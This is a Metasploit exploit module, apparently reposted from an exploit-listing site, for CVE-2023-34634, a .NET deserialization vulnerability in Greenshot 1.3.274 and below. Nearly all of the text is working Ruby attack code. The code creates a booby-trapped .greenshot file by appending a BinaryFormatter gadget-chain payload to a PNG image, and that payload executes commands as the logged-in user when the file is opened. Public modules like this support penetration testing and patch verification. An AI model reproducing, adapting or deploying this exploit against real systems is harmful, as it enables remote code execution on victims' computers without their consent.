Share
## https://sploitus.com/exploit?id=PACKETSTORM:174222
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
include Msf::Post::File  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Greenshot .NET Deserialization Fileformat Exploit',  
'Description' => %q{  
There exists a .NET deserialization vulnerability in Greenshot version 1.3.274  
and below. The deserialization allows the execution of commands when a user opens  
a Greenshot file. The commands execute under the same permissions as the Greenshot  
service. Typically, is the logged in user.  
},  
'DisclosureDate' => '2023-07-26',  
'Author' => [  
'p4r4bellum', # Discovery  
'bwatters-r7', # msf exploit  
],  
'References' => [  
['CVE', '2023-34634'],  
['EDB', '51633']  
],  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => ARCH_CMD,  
'Targets' => [  
[ 'Windows', {} ],  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]  
}  
)  
)  
  
register_options([  
OptPath.new('PNG_FILE', [false, 'PNG file to use'])  
])  
end  
  
def exploit  
if datastore['PNG_FILE'].blank?  
image_file = File.join(Msf::Config.data_directory, 'exploits', 'cve-2023-34634', 'test.png')  
else  
image_file = datastore['PNG_FILE']  
end  
  
datastore['FILENAME'] = Rex::Text.rand_text_alpha(rand(6..13)) if datastore['FILENAME'].blank?  
if datastore['FILENAME'].length < 10 || datastore['FILENAME'][-10, -1] != '.greenshot'  
datastore['FILENAME'] << '.greenshot'  
end  
cmd = payload.encoded  
  
image_data = File.binread(image_file)  
  
deserialize_cmd = ::Msf::Util::DotNetDeserialization.generate(  
cmd,  
gadget_chain: :WindowsIdentity,  
formatter: :BinaryFormatter  
)  
  
payload_length = deserialize_cmd.length  
outfile = image_data  
outfile << deserialize_cmd  
outfile << [payload_length].pack('Q')  
outfile << 'Greenshot01.02'  
file_create(outfile)  
end  
end